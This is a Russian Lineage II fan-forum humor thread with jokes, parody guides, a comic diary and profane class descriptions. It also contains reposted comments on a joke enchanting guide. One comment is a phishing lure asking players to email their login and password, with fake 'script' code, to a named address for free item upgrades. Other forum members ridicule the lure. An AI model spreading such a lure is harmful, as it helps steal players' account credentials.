Главная
 
KoMoKВоскресенье, 28 Апреля 2024, 01:04



Приветствую Вас Гость | RSS
Главная
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Модератор форума: REM  
Форум » LineAge 2 » Новости LineAge2 » Юмор LineAge][
Юмор LineAge][
REMДата: Суббота, 23 Мая 2009, 19:44 | Сообщение # 46
-=SuperADMIN=-
Группа: Администраторы
Сообщений: 2360
Статус: Offline
Награды
За Модераторство За 100 Сообщений За 200 Сообщений За 300 Сообщений За 750 Сообщений За 1500 Сообщений
В настоящее время для любителей игры Lineage II в России поступили в продажу следующие издания:

И.Сусанин "Как найти мастера Тома за три дня"

Родя Раскольников "Что выбрать, топор или двуручный меч"

А.Волочкова "Краткий курс для БД. Танцы до или после"

Р.Абрамович "Успешный спойл"

В.Путин - "А у меня адм знакомый..."

Ю.М. Лужков - "Краткий путь из ДЭ села в Аден по кольцу"


 
REMДата: Суббота, 23 Мая 2009, 19:55 | Сообщение # 47
-=SuperADMIN=-
Группа: Администраторы
Сообщений: 2360
Статус: Offline
Награды
За Модераторство За 100 Сообщений За 200 Сообщений За 300 Сообщений За 750 Сообщений За 1500 Сообщений
Методические указания по походу с кланом на РБ
(для служебного пользования)

Некоторые употребимые определения

1. РБ – Рейд Босс есть суть злобная тварь, обладающая неиссякаемым запасом жизненных сил и оптимизма, сколько на неё не ходи. Относится к РБ стоит с лёгким пренебрежением, выкрикивая перед началом боя ему под хвост оскорбления. Можно увлекшись даже потыкать его оружием, но только один раз.
2. Охрана РБ. Мобы не заслуживающие никакого уважения и внимания. Можно тоже потыкать один раз.
3. ПЛ-Пати Лидер. Человек собирающий пати на РБ. Больше ничем мы ему не обязаны, и слушать его глупые команды не стоит, ишь раскомандовался тут, шайтан.
4. Ассист. После начала боя обязательно спросите, что это такое. Раньше вам всё равно не ответят.
5. Дестры. Это группа придурков зелёного цвета, которая придя на РБ начинает бить друг-друга, а не РБ. На попытки помочь им убиться реагируют крайне раздражительно.
6. ПеПе – это такой человеческий персонаж, который обязательно в середине боя закричит, что у неё кончилась мана, и будет заклинать неизвестного бога Ше налить ей. Но бог Ше редко снисходит к просьбам глупых людишек и не наливает.
7. Танк. Вечно лезущий вперёд персонаж, который сразу же начинает кричать заклинания «хилл меня идиоты» и «рес меня идиоты». На его глупые крики обращать внимания не стоит.
8. БД и СВС взятые для развлечения воинов бродячие артисты. Они зачем-то поют и танцуют. На БД бывает приятно посмотреть во время боя, больно уж фигуристая. Когда РБ вас убьёт – можно заглянуть под юбку.
9. Попа-Ягодка. Ничем особо не выделяющийся маг, за которым РБ вдруг начинает носиться по всей округе, ни обращая более ни на кого внимания. Любые попытки отвлечь РБ от погони за попой-ягодкой обречены на провал..

Мероприятия проводимые кланом на походе.

1. Сбор пати на РБ. Долгий и мучительный процесс, к середине которого первые вошедшие в пати решают что «с них хватит», а последние ,что «без первых всё равно ничего не получится» и выходят тоже. Если пати всё же собралось, то переходим к:
2. Поиск РБ. Глупый вопрос «А где РБ?» обязательно кто-нибудь задаст. И если ПЛ мгновенно на него не ответит словами «го-го-го» и не вылетит в неизвестном направлении в ТП, то его могут побить. Далее, делая вид что знает куда идти, ПЛ должен пробежать через все возможные кучки агрессивных мобов, по дороге избавляясь от наиболее злобных преследователей. Если ему повезло, то по дороге он встретит РБ, и тогда переходим к пункту 3.
3. Ритуальные посиделки. Сидеть перед РБ и флудить а пати-чат надо не менее 20 минут, иначе не будет дропа (народная примета). После того как сядут все бафы стоит задаться вопросом, а где баферы? Если и баферы на месте, то все должны начать кричать «баф меня!» одновременно, шумно ругая каждые 5 секунд после этого «тормознутых баферов». Если у баферов уже кончилась мана, то можно и переходить к четвёртому пункту
4. Счёт. Считать стоит медленно и с удовольствием начиная с цифры 9. От счёта всё равно ничего не зависит, так как на цифре 2 всё равно у кого-нибудь не выдержат нервы и он кинется. Бой начинается с этого момента
5. Бой. Во время боя по традиции хиллеры должны: один – отойти курить, а другой к телефону. Танк должен пасть в неравной схватке, а РБ погнаться за попой-ягодкой, сопровождаемый по пятам грязно ругающимися полуживыми орками. После того как попа-ягодка будет съедена РБ орки всё же догонят его, и в тихом уголке под загадочным «френзи» прихлопнут и съедят, вдохновлённые красотой БД сидящей на пригорочке.


 
REMДата: Суббота, 23 Мая 2009, 21:04 | Сообщение # 48
-=SuperADMIN=-
Группа: Администраторы
Сообщений: 2360
Статус: Offline
Награды
За Модераторство За 100 Сообщений За 200 Сообщений За 300 Сообщений За 750 Сообщений За 1500 Сообщений
Дневник

28Октября
Привет мой дневник, наверно глупо писать тебе, когда мне уже 47 лет, да не удивляйся, я уже такая старая, но мне хотелось бы с тобой поделится. Теперь я уже живу одна с сыном, но вот пишу тебе, как раз из за него, я ни чего не понимаю в его жизни , общается он больше с компьютером чем со мной, извини я плачу, пойду выпью.

1Ноября
Это опять я, да да так бывает, я сама себе удивляюсь у меня своя юридическая контора, я неплоха собой, есть подруги и друзья, но пишу почему то тебе. Опять проблема с сыном, а кому я ещё могу на него пожаловаться? Тока тебе. Может ты мне объяснишь, что за Б грэйд ему нужен? Весь день сидел в наушниках и орал про какой то ассист, про какой то дроп? Не понимаю!

5ноября
Вчера, просил у кого то, по телефону 50 миллионов, я или что то не понимаю или он придуривается. Спросила у него за ужином, чего бы он хотел на новый год, сказал какой то Боп, ни черта не понимаю.

9Ноября
Я разобралась, он играет в игру. Там все играю по Интернету, между собой, надо будет зайти на сайт игры с работы.

11Ноября
Мой дневник, я зашла в игру красиво, но не чего не понимаю, денег нет, благо мой английский позволяет выполнять квесты.

15Ноября
Гы, прикольно, короче, взяла вторую профу, сегодня узнала как ник сына, а со своим я что то напутала, надо было по другому назваться, согласись что Roza Ivanova как то ни подходит для тёмного эльфа.

!9Ноября
Сын запкашил, вообще не прав, не дам денег на карманные расходы ,ругается матом, просто ужас, где тока таких слов то набрался!

28Ноября
Спойлер мне необходим, у сына плохая бижутерия, сегодня нагрубил мне в обед ,поймала и убила, благо был фиолетовый.

3декабря
Начинаю третью профу ,вступила в клан, ух сйчас игра пойдёт.

20Января
Извини дневник, что очень давно не писала, не было времени, лана мне на манор.

25Января
Гы, ты ещё жив дневник, бугага, лана я тп на сходку, сына убиваю каждый день ,никогда не знала что он такая крыса, получил в реале ремнём по сраке.

31Января
Долго те объяснять мой дневник, суко я ссусь «мой дневник» как будто мну 14 лет, лан пох, короче перехожу на офф, заипали нах рэйты 10, взяла сына в клан, буду фанится на этом серваке. Те писать ни буду, ты лол и нуб, гы лано, тп на работу надо ,бб.=)


 
REMДата: Суббота, 23 Мая 2009, 22:02 | Сообщение # 49
-=SuperADMIN=-
Группа: Администраторы
Сообщений: 2360
Статус: Offline
Награды
За Модераторство За 100 Сообщений За 200 Сообщений За 300 Сообщений За 750 Сообщений За 1500 Сообщений
Прикрепления: 8859529.jpg (70.8 Kb)


 
ALLIONДата: Воскресенье, 24 Мая 2009, 22:00 | Сообщение # 50
Admin
Группа: Администраторы
Сообщений: 1316
Статус: Offline
Награды
За создание сайта За 100 Сообщений За 200 Сообщений За 300 Сообщений За 750 Сообщений
да и деньжат у него не хило 500кк, хотя мне больше кажется что скрин с пвп серва, там такое очень частое дело...




 
REMДата: Понедельник, 25 Мая 2009, 02:10 | Сообщение # 51
-=SuperADMIN=-
Группа: Администраторы
Сообщений: 2360
Статус: Offline
Награды
За Модераторство За 100 Сообщений За 200 Сообщений За 300 Сообщений За 750 Сообщений За 1500 Сообщений
гм... Санек походу недоиграл или переиграл smile ответил на пост Мишкин от черт пойми какого года :)))

 
REMДата: Пятница, 05 Июня 2009, 01:10 | Сообщение # 52
-=SuperADMIN=-
Группа: Администраторы
Сообщений: 2360
Статус: Offline
Награды
За Модераторство За 100 Сообщений За 200 Сообщений За 300 Сообщений За 750 Сообщений За 1500 Сообщений
линяговский баш как всегда в тему!

x: а че будет если Мимирс эликсир выпить?
y: ниче. Мимирс эликсир - аналог пива безалкогольного
x: ???
y: выпил - эффекту ноль, и все смотрят на тебя, как на дебила


 
ALLIONДата: Вторник, 23 Июня 2009, 02:57 | Сообщение # 53
Admin
Группа: Администраторы
Сообщений: 1316
Статус: Offline
Награды
За создание сайта За 100 Сообщений За 200 Сообщений За 300 Сообщений За 750 Сообщений





 
ALLIONДата: Вторник, 23 Июня 2009, 02:58 | Сообщение # 54
Admin
Группа: Администраторы
Сообщений: 1316
Статус: Offline
Награды
За создание сайта За 100 Сообщений За 200 Сообщений За 300 Сообщений За 750 Сообщений
Прикрепления: 4590490.jpg (192.6 Kb)





 
ALLIONДата: Вторник, 23 Июня 2009, 03:08 | Сообщение # 55
Admin
Группа: Администраторы
Сообщений: 1316
Статус: Offline
Награды
За создание сайта За 100 Сообщений За 200 Сообщений За 300 Сообщений За 750 Сообщений
И еще пачка целая!






 
NoyДата: Среда, 24 Июня 2009, 00:45 | Сообщение # 56
Специалист
Группа: Пользователь
Сообщений: 472
Статус: Offline
Награды
За 100 Сообщений За 200 Сообщений За 300 Сообщений
ыыы)))
посмеялся!!! супер!

Добавлено (24 Июнь 2009, 00:44)
---------------------------------------------
Линейка – линейка сyка затягивающая, вот так сядешь пол часика порубаться…глядишь все 3 прошло…и на кухне что то пригорело(.

Орки – орки сyка здоровые…
Destroyer – сyка жирный и сильный, пока убьешь 7 потов сойдет.
Tyrant – сyка быстрый, глядишь вроде куча мяса стоит, а как рванет с мета хрен догонишь.
Warcryer – сyка полезный, повозится чего то со спичками, позажигает, а ты потом бегаешь и всех сильно пинаешь ногами.
Overlord – сyка обидный, тоже чего то играется спичками …думаешь ништяк сейчас опять будешь бегать и всех пинать,а получается наоборот.

Гномы – гномы сyка барыги.
Warsmith – сyка богатый, понаделает всякой ерунды из костей и шкурок и сидит на мешкас с деньгами.
Bounty Hunter – сyка любопытный, копается чегото в тушках убитых, вытаскивает что то из них, а потом ету фигню варсмитам сплавляет.

Темные эльфы - сyка темные…хз почему(ходит слух что часто загорают).
Shillien Knight - сyка худой но крепкий, бегает с каими то светлячками над головой…и светлячки эти какие то злые…кусаються суки больно
Blade Dancer - сyка танцор, когда начинает танцевать всем вокруг становиться хорошо, все любят смотреть на эти танцульки.
Abyss Walker – сyка закрвыристый….бывает так покавыряет ножичком что плохо становиться.
Phantom Ranger – сyка стреляет, часто и иногда очень больно.
Phantom Summoner – сyка загадочный, все время ходит с каким то приведениями и тенями.
Spellhowler – сyка колдует, читает умные книжки а потом показывает фокусы от которых некоторые окружающие отправляются в ближайшую деревню.
Shillien Elder – сyка то же полезный

Эльфы - сyка ушастые.
Temple Knight - сyка ушастый и крепкий, но маложизненный.
Sword Singer - сyка певец, любит порадовать окружающей хорошей душевной песенкой, особенно хорош в паре с танцором…получается целое шоу, на которое собирается еще больше зрителей.
Plains Walker - сyка играет с ножичками, также как и АВ может поковырять им в разных метах у противника.
Silver Ranger-- сyка партизан, выбегает неожиданно из за кустов утыкивает всех стрелами и убегает обратно… никто так и не узнал что он делает в кустах пока никого вокруг нет.
Elemental Summoner - сyка любит животных, особенно всяких единорогов, в секрете ото всех держит ипподром, на котором зарабатывает деньги.
Spellsinger - сyка умный и еще петь умеет, также как и СХ любит показывать фокусы, особенно воздушные и водные.
Elven Elder - сyка это как Shillien Elder тока не загорал никогда.

Люди - сyка обычные
Dark Avenger – сyка вроде и воин, но любит кошек…кошки cyка здоровые и сильные…не дают в обиду хозяина.
Paladin - сyка терпеть не может мертвяков, поэтому борится с ними всеми возможными способами.
Warlord - сyка любит воевать, поэтому так и назвали…хлебом не корми дай в кого- нибудь потыкать пикой.
Gladiator - сyка красавчег бегает с 2-мя мечами, соблазняет девушек.
Treasure Hunter - сyка борзый, постоянно ко всем пристает с предложением пвп.
Hawkeye – сyка глазастый, как наслушается песен, насмотрится танцев, проговорит с другими полезными персами…сразу начинает глазеть по сторонам и если кого увидит, дарит бесплатный телепорт до ближайшей деревни.
Sorceror - сyка еще один представитель умных фокусников.
Necromancer - сyка странный, любит зомби и всяких скелетиков, что он с ними делает так же является секретом, но когда они выходят на прогулку…лучше отойти подальше.
Warlock - сyка тоже как и ДА любит кошек, только игрушечных.
Bishop - сyка доктор, умеет вытащить буквально с того света
Prophet -сyка тоже фокусник, но добрый и хороший, любит радовать зрителей пришедших посмотреть на танцы и песни.

Добавлено (24 Июнь 2009, 00:45)
---------------------------------------------
Осада - сyка прикольные лаги, бой сyка в покадровом режиме…еще она объединяет, после начала осады не участвующие в ней игроки начинают дружна начинают мечтать об скорейшем ее окончании.
Соски -сyка вкусно…тока хавает их твоя пушка а, хорошо тебе.
ПК - сyка достали.
Тату - сyка все по чесному, где- то сделаешь больше, где- то уменьшиться…так что либо в длину, либо в ширину.
PvP- сyка мордобой, стрелоутыкивание и фокусы.

STR - сyка сила…чем больше, тем сильнее…а что сильнее пока еще не известно
CON - сyка предрасположение к ожирению…вот орки они cyка жирные.
DEX - сyка шустрость…т.е бьешь быстро, часто, иногда больно и еще по тебе хрен попадешь.
WIT - сyка смекалка…маги поговаривают даже специально пропускают в заклинании некоторые буквы что бы быстрее его прочесть и все порадовать(в основном тока себя).
INT - сyка интеллект(или просто батанизм) чем больше тем фокусы получаются ярче и красивее.
MEN - сyка мудрость( такая же жирность, но мозгов)…чем больше тем больше можно показать фокусов и ежили что от их нехороших эффектов помогает защититься.
HP - сyка важно,…каждый мечтает что бы этот красны столбик не уменьшался никогда
MP - сyка такая же фигня
P.Atk - сyка сила пинка по врагу, когда ее много врагам становиться не приятно
P.Def - сyка защита от пинка по тебе, когда этого много, так же почему то неприятно врагам.
M.Atk - сyка сила влияния эффекта от фокуса на окружающих.
M.Def - сyка защита от нехороших фокусников с их неприятными фокусами
P.Aspd - сyка скорость с которой работает твоя мясорубка.
M.Aspd - сyка ловкость рук у иллюзиониста
Accuracy - сyка точность….чем больше, тем чаще твоя пушка находит тушку противника
Critical - сyка критичность….но не самокритичность, не критика и даже не критические дни как могло бы показаться…а это такая фигня…которая приятная, если срабатывает.
Evasion - сyка хрен попадешь.
Movement - сyка бегаем…куда и зачем…дело каждого
Load - сyка размер твоего кармана

Temple Knight сyка редкий! Любит быть в компании с нежитью арчером, так как тот ему хрен что-то сделает! В руках у Кнайта еще один кнайт илидубина, если в руках у него что-то другое, то ето не Темпл Кнайт а скорее всего сyка нуб!
SwordSinger сyка певчий! Мало того, что он не прошел отборочный тур в Евровидиние, так еще и набрел в инете на Линейку! Еще СвС нужный пати мембер! Но его песни такие заковыристые, что их сyка забывают и ему приходится петь заново! Бывают СвордСингеры сyка еще и приколюги! Которые вместо запросов "попой" сyка пишут в пати чат "ляляля!

PlainsWalker сyка как все ельфы шумахер ! Но если у того отобрали права за привышение скорости, то у ПлейнсВалкера хрен их отберешь так как у него их нету! По етому вывод, что ПВ сyка тот чувак, который снимался в фильме Taxi ! Еще ПВ сyка не подпускай к себеее !!! Так как любит делать в телах дополнительныйе кровотоащие дырочки, который нахрен никому не надо ! По етому ПлейнсВалке схватывает рут от папок сервера.

Elemental Summoner сyка лошадевод ! Ета тварь может запросто убить своего хозяина, по етому лошадь выступает у соммонера вместо "крыши", которой ЕС платит кристалы каждые 10 минут ! сyка Сумонер пофигист ! Так как не убирает за своим парнокопытным питомцем. По етому не влазьте в мины! Если в игре вы застряли в каком-нибудь месте - знайте, что ето сyка жопа! Потому, что вы скорее всего так увязли в дерьме, что надо делать откат или звать ГМов!

SpellSinger сyка прикольный. В то время как пати путем потери здоровья и нервов убивает 70 * 5 моба, он сyка просто его тормозит и шлепает за пару ударов! а потом сyка еще и втыкает как выше упомянутое пати добивает оставшуюся половину ХП моба ! Еще СпС сyка говорливый! По этому скоростья каста у него огромная. Говорливость наводит на мысль что СпС сyка циган из фильма "Сп_здили"

Dark Avenger ДА сyка 100%. Лучше не спрашивайте какой у него параметр p.def, так как лучше не спрашивайте! В то время как вы еле накопили на авадон, ДА бегает сyка в С грейде и п деф сyка у него больше чем у вас в 2-а раза !

Warlord сyка кто ето такой ! ? !

Phantom Ranger сyка неформал ! Впрочим как и все его родичи. Ночью в кустах его хрен увидишь! Потому, что сyка он не в кустах а у вас за спиной....и сyка вы уже в городе!


а у нас откат... а у вас???
 
ALLIONДата: Среда, 24 Июня 2009, 02:24 | Сообщение # 57
Admin
Группа: Администраторы
Сообщений: 1316
Статус: Offline
Награды
За создание сайта За 100 Сообщений За 200 Сообщений За 300 Сообщений За 750 Сообщений
biggrin biggrin biggrin
Галыгин увидел линейку?





 
ALLIONДата: Среда, 24 Июня 2009, 10:20 | Сообщение # 58
Admin
Группа: Администраторы
Сообщений: 1316
Статус: Offline
Награды
За создание сайта За 100 Сообщений За 200 Сообщений За 300 Сообщений За 750 Сообщений
Сегодня чисто случайно наткнулся на правила набора в какой то линеешный клан, взгляника wink

Здравствуйте Я Бенджамин Лайнус, мой ник в игре "BenjaminLinus

Создаю набор в клан Dharma (Дарма инишиатив) Лвл клана 7 (пока, но я веду над этим работы)

Для того чтоб попасть в клан Dharma нужно :

1.80лвл
2.минимум 2 Саб-класса , и чтоб один из классов был боевой маг (Некр,мм,сорк,сх...)
3.Иметь шмот заточенный от +10
4.Иметь Бижутерию заточенную от+10
5.Иметь оружие заточенное от+16
6.Быть он лайн в игре от 4 часов в день
7.Иметь стаж игры от 1 года
8.Желательно Иметь какую нибудь РБ бижутерию (по возможности)
9.Иметь вточенные скилы (хотябы 2-3 главных скила) Минимум заточенных на +9
10.Желательно иметь что-то из перечисленного тут--->>> Icq(qip)-, Скайп, М-Агент

biggrin biggrin biggrin





 
REMДата: Среда, 24 Июня 2009, 12:50 | Сообщение # 59
-=SuperADMIN=-
Группа: Администраторы
Сообщений: 2360
Статус: Offline
Награды
За Модераторство За 100 Сообщений За 200 Сообщений За 300 Сообщений За 750 Сообщений За 1500 Сообщений
жеееееесть!!!

 
NoyДата: Среда, 24 Июня 2009, 13:43 | Сообщение # 60
Специалист
Группа: Пользователь
Сообщений: 472
Статус: Offline
Награды
За 100 Сообщений За 200 Сообщений За 300 Сообщений
наткнулся и решил выложить с коментами:
САМ ТЕКСТ:
Способы заточки оружия

Способ #1

Он же самый известный. Берем в одну руку оружие, которое хотим заточить, в другую руку заточку. Открываем опции чара и жмем на клавишу "хлопать руками" и все – оружие заточено!!!! Повторяем процесс… точим до бесконечности.
Способ #2

Качаем бишоапа до 77 левела. Далее делаем ему делевел до 14 левела и снова качаем его до 77 левела. Все!!! Теперь этим бишопом можно точить все что угодно… даже без заточки.
Этот чит связан с одним из разработчиков игры. Для этого человека числа 77 и 14 счастливые, поэтому он специально вставил этот чит в игру. Объяснение этому очень простое – у него 77 волос на голове и 14 зубов.
Способ #3

Можно так же точить оружие сразу по +2, а не на +1. Для этого надо взять 2 заточки и просто тупо их задуалить.
Способ #4

Есть еще один очень интересный способ заточки. Берем заточку и выкидываем ее на землю. В то же самое место кидаем пушку, которую мы хотим заточить (получается, что заточка и оружие лежат друг на друге). Далее своим чаром садимся прямо на оружие и заточку. Оружие точиться не ломаясь до +100. Почему пушка не ломается? Да потому, что вы не точите оружие, а как бы вминаете заточку в оружие. Само собой вминать лучше всего орком.
Способ #5

Брем в руку пушку, берем заточку, наводим заточку на оружие, активируем соску левой рукой и вырубаем комп из розетки. Когда снова заходим в игру – оружие будет заточено. Таким способом можно точить пушку до тех пор, пока у вас не полетит операционная система.
Способ #6

Для этого метода у вас в инвентаре должна лежать пушка, которую вы хотите заточить и некоторое количество заточек (на сколько вы хотите заточить свою пушку). Ищем любого рейд босса вашего уровня. Незаметно подбираемся к нему сзади и начинаете его лупить… пока не завалите. С него падает разный лут (внимание!! лут не подбирем). Далее, кидаем в эту кучу выпавшего лута свою пушку и все заточки (например вы кинули БоП и 50 заточек). Дальше самое простое… ресаем рейд босса. Когда вы его реснули, он сразу же подберет весь свой дроп и заодно скрысит вашу пушку с заточками. Далее снова его валим. С него упадет весь его лут и ваш БоП, но уже заточенный на + 50. Минусы этого метода в том, что более чем 3 раза этот метод не пройдет. Просто любой рейд босс (после того как вы его 4-6 раз так бессовестно обманите и убьете), завидя вас издалека, сразу броситься в противоположную от вас сторону и вряд ли вы его уже больше увидите).
Способ #7

Вы наверняка слышали, что оружие точиться лучше всего темными магами высокого левела (якобы у них самый большой интеллект, а заточка зависит от INT) все это полный бред!! Я вам открою секрет, каким чаром лучше всего точить!!! Лучше всего точить гномом, имеющего профу "слесарь шестого разряда".
Способ #8

Летим в аден. Подбегаем к первому попавшемуся гварду. Атакуем его. Получаем по мозгам. Ресаемся – снова бежим к тому же гварду. Снова атакуем… отдаемся. И так далее... В итоге отдаемся гварду до тех пор, пока не спустите, как минимум 5 левелов. Как только спустили 5 и более левелов - подходим к тому же гварду и точим возле него пушку. Пушка не ломается и точиться спокойно до + 50. Это связано с тем, что сервер игры видит ваши бесполезные и тщетные попытки завалить охранника и тем самым он осознает вашу ущербность (бесполезность) в игре. Ему становиться очень стыдно и как бы в качестве извинений он позволяет вам заточить свое оружие. Cпособ в народе назван "Давить на жалость"

КОМЕНТЫ:

Сказал [ Гость ] Дата: Втр, 26.08.2008 в 19:04.

аффтар данного поста явно надеялся найти в этой статье вселенскую мудрость читеров-ламеров))
Наверняка сейчас биша качает)

Сказал [ Гость ] Дата: Втр, 30.09.2008 в 22:26.

Ребята, вобще то я сам в этот бред не поверил, но решил проверить все способы. Результатом сал бишоп 77 лвл который действительно точит всё подряд без точек. Остальные варианты гон полный.

Сказал [ Гость ] Дата: Чт, 09.10.2008 в 23:58.

как без точки заточить? бишопом

Сказал [ KILLandEAT ] Дата: Пт, 10.10.2008 в 00:36.

Ы!

Сказал [ Гость ] Дата: Втр, 14.10.2008 в 19:54.

а как єто без заточек ты точеш? чё у него появляеться скил който???

Сказал [ Гость ] Дата: Пт, 24.10.2008 в 13:15.

аффтар жжет пиши исчо!!!!

Сказал [ Гость ] Дата: Сб, 25.10.2008 в 09:02.

Хочу поделиться с вами одним способом заточки на la2.theabyss.ru.
Взлом заточки происходит очень быстро и просто из-за этого робота, который управляет донейтом. Когда кто-то за 100 долларов точит драк на +20, его запрос обрабатывается роботом, которые посылает скрипт на почту, через которое непосредственно и точится ваша вещь. Главное, делать все правильно, как я написал.
Этот скрипт написан для того, чтобы бот заточил некоторую вещь на определенный +. Бот принимает письма этому ящику" l2services@bk.ru " . Не представляете каких трудов мне стоило разузнать его!
Пошлите письмо на этот ящик со следующим скриптом, заменяя строчки своими данными, без дополнительных пробелов и символов. Лучше просто скопируйте этот скрипт и просто замените ненужные данные. Если у вас уже точеная вещь, то заточка, которую вы указали, просто прибавится к нему.
Не злоупотребляйте! (настоящие люди же не могут так часто донатить,как вы хотите точить вещи Я еще сам не разобрался, почему-то на новые аккаунты которые вы создали недавно заточка не работает Если соблюсти все правила, то гарантирую 100% результат. В момент заточки ваш персонаж не должен находится в игре, и оружие должно быть в руках! После отправки скрипта вы не должны использовать аккаунт в течении 12 часов.
Да что там греха таить, все этим скриптом пользуются, и на всех серверах, нужно толко разузнать почту какого-нибудь робота и написать к нему правильный скрипт. Желаю удачи!

server:= "имя сервера "
item$ := "укажите полное название затачиваемого предмета или ид"
enchant$ := "укажите цифру, на сколько хотите заточить вещь"
id$ := "ваш логин"
Characters := "имя чара"
pass := loadpwlfile(serveraccountpassword''''id''''.pwl)
pass$ := "ваш пароль"
q1 := loadfile(serveraccountpassword''''id.q1''''.sql)
function backpassword(id,pass,q1,q2,i,k)
if id= true and pass$=loadpwlfile(serveraccountpassword''''id$'''' .pwl)
then
if q1 = true
then
send.file.pass"Ваш почтовый адрес"
end if
end function

МОЙ КОМЕНТ
НАДЕЮСЬ НИКТО НА ЭТОТ БРЕД НЕ ПОВЕДЕТСЯ!!!!

Сказал [ Гость ] Дата: Пнд, 24.11.2008 в 13:06.

Саме смішне з РБ як його можна Реснути ?))))))))))

Сказал [ Гость ] Дата: Втр, 25.11.2008 в 13:52.

Как как Б рес ))

Сказал [ Гость ] Дата: Чт, 27.11.2008 в 14:04.

а как брать заточку в правую руку я знаю этот способ тока всех спрашиваю никто не знает

Сказал [ KILLandEAT ] Дата: Чт, 27.11.2008 в 22:33.

а как брать заточку в правую руку я знаю этот способ тока всех спрашиваю никто не знает

попробуй тогда взять в левую... давно известный баг ла2... если и в левую не берет, то срочно пешы петицыйу админам по поводу глобальнова кризиса багов в ла2 и требуй возмещения ущерба как морального, так и материального

Сказал [ sour ] Дата: Чт, 27.11.2008 в 23:47.

Все просто- автор глад с дуалами, и обе руки заняты)

Сказал [ Гость ] Дата: Пт, 09.01.2009 в 17:29.

Эти способы реальны?ОТВЕТЬТЕ ТОЛЬКО ЧЕСНО!

Сказал [ Chalk ] Дата: Сб, 10.01.2009 в 02:47.

у мя арка +20 и бижа +8 вся.. вот задумайся..
зы использовал метод с бишопом, с другими не получалось таких достижений

Сказал [ KILLandEAT ] Дата: Сб, 10.01.2009 в 07:58.

Quote:

Эти способы реальны?ОТВЕТЬТЕ ТОЛЬКО ЧЕСНО!

такие люди продлевают мне жызнь

Сказал [ Makc ] Дата: Сб, 24.01.2009 в 08:35.

Народ у меня вопрос, когдая кидаю оружие на заточку а потом сажусь на неё она почемуто не вменается мочему?

Сказал [ Chalk ] Дата: Вс, 25.01.2009 в 03:52.

а ты дестром садился? надо еще ИК сет одеть и дуалы потяжелее взять - тогда точно спресуется

Сказал [ KILLandEAT ] Дата: Вс, 25.01.2009 в 09:23.

и еще инвентарь набить всяким тяжолым барахлом, как у спойлера на 70+ чем тяжелее выйдет, тем больше шанс заточить з.ы. у миня брат в нцсофт работает, вот баги и подкидывает
а и еще... шанс заточки напрямую зависит от IQ и возраста геймера... чем он тупее, тем больше вероятность того, что вместо заветной арки +стотыщпицот вы получите кучу Ы кристаллов

Сказал [ Fax ] Дата: Пнд, 09.02.2009 в 19:18.

Народ, а на камаэльке эти способы прут?

Сказал [ Gonjubas ] Дата: Пнд, 09.02.2009 в 23:18.

ЫЫЫ... каменты как всегда рулят по полной, особенно "почему я сажусь, а он не точится". я плакаль... Совет, садится надо на монитор, положенный в ванну с водой, голой ж..., с феном в руках, включенным в розетку... 100 пудов поможет. ЫЫЫ

Сказал [ Гость ] Дата: Сб, 14.02.2009 в 07:00.

ППц Смеялся до СЛЕЗ!!!! Автору ЗАЧЕТ!!! Монстр Юмора!!! И нубье с вопросами "почему не получается?" Этто просто нешто!!!!!
))))))))))))))))))))))))))))))))))))))))

Сказал [ Guunia ] Дата: Сб, 14.02.2009 в 11:50.

Народ, а на камаэльке эти способы прут?

Да

Сказал [ Гость ] Дата: Пнд, 23.02.2009 в 22:41.

ХЗ!!! я хлопоя токо до 22 точил!!!!!

Сказал [ Гость ] Дата: Пт, 13.03.2009 в 05:06.

Пиздец...какой долбаёб на это поведётся...а про баши 77 бред полнейший...как можно точить без точки, объясните мне biggrin

Сказал [ 100500 ] Дата: Втр, 31.03.2009 в 23:31.

способы бредовые... кроме бишеповского я на шоке точнул хомку на 10 дальше кончились точки.. ну я ничего ещё набью и ещё тачну!А способ вминания у меня пашет через раз однако надо вминать на площади гирана т.к. там асфальт наиболее твёрдый я раньше за городом вминал и точки пропадали... думаю куда они пропадали . а терь понил они за место пушки в почву вминаются(

Сказал [ Лего ] Дата: Чт, 18.06.2009 в 09:14.

+_+ Играю на Абусе , я чуть Этому так называему боты свой пароль и логин не отправил))) НО потом допёрло если он бот то зачем ему знть логин и пароль он и без етого зайти сможет, короче послал наХ-У-Й !!!

Сказал [ KILLandEAT ] Дата: Чт, 18.06.2009 в 23:25.

ты гениален. нет, правда гениален. тату на +5 инт стоит?


а у нас откат... а у вас???
 
Форум » LineAge 2 » Новости LineAge2 » Юмор LineAge][
Поиск:



Copyright http://komok.do.am/ © 2024